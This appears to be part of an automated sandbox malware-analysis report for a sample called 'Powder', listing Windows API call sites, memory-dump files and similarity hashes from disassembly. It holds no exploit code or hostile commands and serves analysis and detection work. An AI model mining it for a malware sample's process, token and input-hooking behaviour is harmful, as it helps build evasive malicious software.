                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 4e8141ab1beeaa4a2ab5e4428abe276c951856523c4a82f25743873b753a6503
                                                  • Instruction ID: 52cf5a20e90b3ff6061a3326e622ded98db026fa63e4cfcbd49efc0c9b621c74
                                                  • Opcode Fuzzy Hash: 4e8141ab1beeaa4a2ab5e4428abe276c951856523c4a82f25743873b753a6503
                                                  • Instruction Fuzzy Hash: 2711483A900218FFEB10DF95C984EDDBBB8FB48710F204092E904B7291D6716E14DB90
                                                  APIs
                                                    • Part of subcall function 00E029E2: GetWindowLongW.USER32(?,000000EB), ref: 00E029F3
                                                  • DefDlgProcW.USER32(?,00000020,?), ref: 00E016B4
                                                  • GetClientRect.USER32(?,?), ref: 00E3B93C
                                                  • GetCursorPos.USER32(?), ref: 00E3B946
                                                  • ScreenToClient.USER32(?,?), ref: 00E3B951
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                  • String ID:
                                                  • API String ID: 4127811313-0
                                                  • Opcode ID: f021915e8faaf54bccf84b21fa4c9cb64a487b53282a0435b2b2cbd83918e984
                                                  • Instruction ID: f02ae7e7a6764ca2bb1a2da0901d8c3c8ea6833531b4509feec8bfe5749f2c5e
                                                  • Opcode Fuzzy Hash: f021915e8faaf54bccf84b21fa4c9cb64a487b53282a0435b2b2cbd83918e984
                                                  • Instruction Fuzzy Hash: 52114336A00019AFCB10EF98EC89DFE77B8EB44300F441496F941FB180C331AA91CBA2
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E0214F
                                                  • GetStockObject.GDI32(00000011), ref: 00E02163
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E0216D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CreateMessageObjectSendStockWindow
                                                  • String ID:
                                                  • API String ID: 3970641297-0
                                                  • Opcode ID: 754fb885dc6c18711e2b7bcdd0c7116003e59842fa562f2cd57fdf20ed70c85d
                                                  • Instruction ID: fdf28d57484372952c9deb0cfd1a696e13db1537b943ac511ccf06b62f92e146
                                                  • Opcode Fuzzy Hash: 754fb885dc6c18711e2b7bcdd0c7116003e59842fa562f2cd57fdf20ed70c85d
                                                  • Instruction Fuzzy Hash: 9D11AD72502109BFDF028F959C88EEBBBA9EF58364F04011AFB1462090C731DCA1EBA0
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E604EC,?,00E6153F,?,00008000), ref: 00E6195E
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00E604EC,?,00E6153F,?,00008000), ref: 00E61983
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E604EC,?,00E6153F,?,00008000), ref: 00E6198D
                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,00E604EC,?,00E6153F,?,00008000), ref: 00E619C0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CounterPerformanceQuerySleep
                                                  • String ID:
                                                  • API String ID: 2875609808-0
                                                  • Opcode ID: 18d72d60614b7a3137038e71cc35c5d967201bc11569ca8a400a30b41825221c
                                                  • Instruction ID: 9b1b5af9ae5af9ead0a7e1fa4f02a476b6875db6a98bfc7c175fa79662bf035f
                                                  • Opcode Fuzzy Hash: 18d72d60614b7a3137038e71cc35c5d967201bc11569ca8a400a30b41825221c
                                                  • Instruction Fuzzy Hash: 7C117C31C4562CDBCF019FA6E958AEEBB78FF48791F444186E981B2240CB309650CB95
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00E8E1EA
                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00E8E201
                                                  • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00E8E216
                                                  • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00E8E234
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Type$Register$FileLoadModuleNameUser
                                                  • String ID:
                                                  • API String ID: 1352324309-0
                                                  • Opcode ID: d48f38ce36ad92ea1a7392bac153a5e33c7148d667edb94c068ec27911b17ac1
                                                  • Instruction ID: 6697cc6001b97cee90132301983675c48943f46788be22ac0842abdd0c9bf357
                                                  • Opcode Fuzzy Hash: d48f38ce36ad92ea1a7392bac153a5e33c7148d667edb94c068ec27911b17ac1
                                                  • Instruction Fuzzy Hash: AE1161B5205304DFE3309F51ED08F97BBBCEF01B14F10855AA66EE6260D7B0E9089BA1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                  • String ID:
                                                  • API String ID: 3016257755-0
                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction ID: ac1c87db8015ba633fc121740ccc75c6295d0de4a471c8cdecac1d4f890c28b6
                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction Fuzzy Hash: DD0189B204814EBBCF226E84CC098EE3F62BB19354F099515FE9868131D336C9B1FB81
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 00E8B956
                                                  • ScreenToClient.USER32(?,?), ref: 00E8B96E
                                                  • ScreenToClient.USER32(?,?), ref: 00E8B992
                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E8B9AD
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                  • String ID:
                                                  • API String ID: 357397906-0
                                                  • Opcode ID: b19c4a4e01ddc1233394b25f6cf7ac7a73070891d7a0db800bfaa3293e584867
                                                  • Instruction ID: 4e4628484e9133739a2ea121c150f3b742ef9cc1bdf48fbdf8e6f963ab7f593a
                                                  • Opcode Fuzzy Hash: b19c4a4e01ddc1233394b25f6cf7ac7a73070891d7a0db800bfaa3293e584867
                                                  • Instruction Fuzzy Hash: C91163B9D00209EFDB41DF99C884AEEBBF9FF48310F504156E915E3610D731AA658F50
                                                  APIs
                                                  • _memset.LIBCMT ref: 00E8BCB6
                                                  • _memset.LIBCMT ref: 00E8BCC5
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00EC8F20,00EC8F64), ref: 00E8BCF4
                                                  • CloseHandle.KERNEL32 ref: 00E8BD06
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseCreateHandleProcess
                                                  • String ID:
                                                  • API String ID: 3277943733-0
                                                  • Opcode ID: db0fa50141bd3b60795061cabc12f89156fb508325aa1d1724e05c76a1578323
                                                  • Instruction ID: 9b3767590f83f2d61dbfa2a405bedb3d42f79dd18d9afac224f25fa67eef2004
                                                  • Opcode Fuzzy Hash: db0fa50141bd3b60795061cabc12f89156fb508325aa1d1724e05c76a1578323
                                                  • Instruction Fuzzy Hash: 3DF0B4B26003487FE25027626E06FBB3A5DEB08710F00143ABA48F5092DB76480587B8
                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(?), ref: 00E671A1
                                                    • Part of subcall function 00E67C7F: _memset.LIBCMT ref: 00E67CB4
                                                  • _memmove.LIBCMT ref: 00E671C4
                                                  • _memset.LIBCMT ref: 00E671D1
                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00E671E1
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                  • String ID:
                                                  • API String ID: 48991266-0
                                                  • Opcode ID: bc9e228bffde189121c5130a26f154820d53b61e039f0e0e5e06cf87d51b8cbf
                                                  • Instruction ID: 24ca39fc96b6c6c4fa322c3810d21fe3bdc8ac6804cd2d3ae37f929b61256694
                                                  • Opcode Fuzzy Hash: bc9e228bffde189121c5130a26f154820d53b61e039f0e0e5e06cf87d51b8cbf
                                                  • Instruction Fuzzy Hash: 0AF03036100110AFCB016F55EC85E4ABB69EF45360F088052FE086E22BC731A915DBB4
                                                  APIs
                                                    • Part of subcall function 00E016CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E01729
                                                    • Part of subcall function 00E016CF: SelectObject.GDI32(?,00000000), ref: 00E01738
                                                    • Part of subcall function 00E016CF: BeginPath.GDI32(?), ref: 00E0174F
                                                    • Part of subcall function 00E016CF: SelectObject.GDI32(?,00000000), ref: 00E01778
                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E8C3E8
                                                  • LineTo.GDI32(00000000,?,?), ref: 00E8C3F5
                                                  • EndPath.GDI32(00000000), ref: 00E8C405
                                                  • StrokePath.GDI32(00000000), ref: 00E8C413
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                  • String ID:
                                                  • API String ID: 1539411459-0
                                                  • Opcode ID: f7f482093e51cb5106fe7d3914b12f691905e7bca859e8c650b4704daac7ef26
                                                  • Instruction ID: e23a7fd8f93fe26e16f0b4b72868412420d1b807465923b155ad25e9a382595e
                                                  • Opcode Fuzzy Hash: f7f482093e51cb5106fe7d3914b12f691905e7bca859e8c650b4704daac7ef26
                                                  • Instruction Fuzzy Hash: 5AF0BE32005228BEDB122F52AC0EFDE3F59AF06310F448002FA59310E183B51599DFA9
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E5AA6F
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E5AA82
                                                  • GetCurrentThreadId.KERNEL32 ref: 00E5AA89
                                                  • AttachThreadInput.USER32(00000000), ref: 00E5AA90
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 2710830443-0
                                                  • Opcode ID: ca77e67c177ee2db06759f9b0d785fc2195b25d7964f2566b52b0a24bc6330dc
                                                  • Instruction ID: 14440da3a00c78f07c99bdd073576a76eafe458953a474cb69eec03ec5746842
                                                  • Opcode Fuzzy Hash: ca77e67c177ee2db06759f9b0d785fc2195b25d7964f2566b52b0a24bc6330dc
                                                  • Instruction Fuzzy Hash: B1E03972541228BEDB215FA29D0CEEB3F1CEF117A2F448122F909A4462C7718558CBA0
                                                  APIs
                                                  • GetSysColor.USER32(00000008), ref: 00E0260D
                                                  • SetTextColor.GDI32(?,000000FF), ref: 00E02617
                                                  • SetBkMode.GDI32(?,00000001), ref: 00E0262C
                                                  • GetStockObject.GDI32(00000005), ref: 00E02634
                                                  • GetWindowDC.USER32(?,00000000), ref: 00E3C1C4
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E3C1D1
                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 00E3C1EA
                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 00E3C203
                                                  • GetPixel.GDI32(00000000,?,?), ref: 00E3C223
                                                  • ReleaseDC.USER32(?,00000000), ref: 00E3C22E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                  • String ID:
                                                  • API String ID: 1946975507-0
                                                  • Opcode ID: 404adc95475d2436775efda19d51a179e7282f68e12a4ba02ea27f6ee0905f32
                                                  • Instruction ID: 861925cb01c2342a602ff4b626cbc11a5618cae3299ef4d837090bd307809a1d
                                                  • Opcode Fuzzy Hash: 404adc95475d2436775efda19d51a179e7282f68e12a4ba02ea27f6ee0905f32
                                                  • Instruction Fuzzy Hash: 74E03932505244AEDB215FAAAC0DBE83B21EB05336F548367FA69680E187724984DB11
                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 00E59339
                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E58F04), ref: 00E59340
                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E58F04), ref: 00E5934D
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E58F04), ref: 00E59354
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CurrentOpenProcessThreadToken
                                                  • String ID:
                                                  • API String ID: 3974789173-0
                                                  • Opcode ID: 7cd9a72a818789b54f81ffde3d7d3baf58ef35cd2144721dd9f715d5197f9390
                                                  • Instruction ID: 39c366b0dc4851649f71fe95f050939de99714e5a6b8f5e4f12fceb22674e60f
                                                  • Opcode Fuzzy Hash: 7cd9a72a818789b54f81ffde3d7d3baf58ef35cd2144721dd9f715d5197f9390
                                                  • Instruction Fuzzy Hash: 79E08632601211DFD7205FB29D0DB9A3B6CEF50796F104C5ABA45E9091E734944CC750
                                                  APIs
                                                  • GetDesktopWindow.USER32 ref: 00E40679
                                                  • GetDC.USER32(00000000), ref: 00E40683
                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E406A3
                                                  • ReleaseDC.USER32(?), ref: 00E406C4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                  • String ID:
                                                  • API String ID: 2889604237-0
                                                  • Opcode ID: 501a0d8a8da7e095d98f9759b81f6e5cf77beed4981437fb655e3e4246b4ce36
                                                  • Instruction ID: 6ae0d2cc0e562a8724972038cbdb7ecc719eddb4ab7e46f8a8767d6471bc18e7
                                                  • Opcode Fuzzy Hash: 501a0d8a8da7e095d98f9759b81f6e5cf77beed4981437fb655e3e4246b4ce36
                                                  • Instruction Fuzzy Hash: BFE0E5B2800204EFCB019F65D808A9D7BF1AF88310F51845AF95AF7650CB7895959F50
                                                  APIs
                                                  • GetDesktopWindow.USER32 ref: 00E4068D
                                                  • GetDC.USER32(00000000), ref: 00E40697
                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E406A3
                                                  • ReleaseDC.USER32(?), ref: 00E406C4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                  • String ID:
                                                  • API String ID: 2889604237-0
                                                  • Opcode ID: 4686212897768b48e7c017a91c65009adb416fc8b57f4e33cafe865a698e673e
                                                  • Instruction ID: e92bacfe4b0feabb16da9467e5fe84a6ace9aa53cdbca97a4056b9fa2d3cadfb
                                                  • Opcode Fuzzy Hash: 4686212897768b48e7c017a91c65009adb416fc8b57f4e33cafe865a698e673e
                                                  • Instruction Fuzzy Hash: B7E012B2800204EFCB019FA6D808A9D7FF2AF8C320F50840AF95AF7290CB7895958F50
                                                  APIs
                                                    • Part of subcall function 00E1436A: _wcscpy.LIBCMT ref: 00E1438D
                                                    • Part of subcall function 00E04D37: __itow.LIBCMT ref: 00E04D62
                                                    • Part of subcall function 00E04D37: __swprintf.LIBCMT ref: 00E04DAC
                                                  • __wcsnicmp.LIBCMT ref: 00E6B670
                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00E6B739
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                  • String ID: LPT
                                                  • API String ID: 3222508074-1350329615
                                                  • Opcode ID: 218328d96933b9d1db78a9f38a0bf8830e73707644bb1dece151b3fc82aa11eb
                                                  • Instruction ID: 1fcdb340b6772ecbaf777a38827c337449652d83e573297f2ed5f1905e7196f6
                                                  • Opcode Fuzzy Hash: 218328d96933b9d1db78a9f38a0bf8830e73707644bb1dece151b3fc82aa11eb
                                                  • Instruction Fuzzy Hash: CE616FB5A40219AFCB14DF54D981EAEB7F4EF48350F00915AF946FB291D770AE81CB50
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID: #V
                                                  • API String ID: 4104443479-3658881132
                                                  • Opcode ID: 2407371db873264cb70e8286f114befc795b8fba78090c78daa5dc2e1da954d9
                                                  • Instruction ID: a767a5d694a82dd4c1ef3097fcdb96ff97cfe0c337446e02536ceba90d61adc6
                                                  • Opcode Fuzzy Hash: 2407371db873264cb70e8286f114befc795b8fba78090c78daa5dc2e1da954d9
                                                  • Instruction Fuzzy Hash: A1516270901609DFCF24CF68D880AEEBBF1FF45304F24552AE85AE7250E731A995CB91
                                                  APIs
                                                  • Sleep.KERNEL32(00000000), ref: 00E0E01E
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E0E037
                                                  Strings
                                                  Memory Dump Source
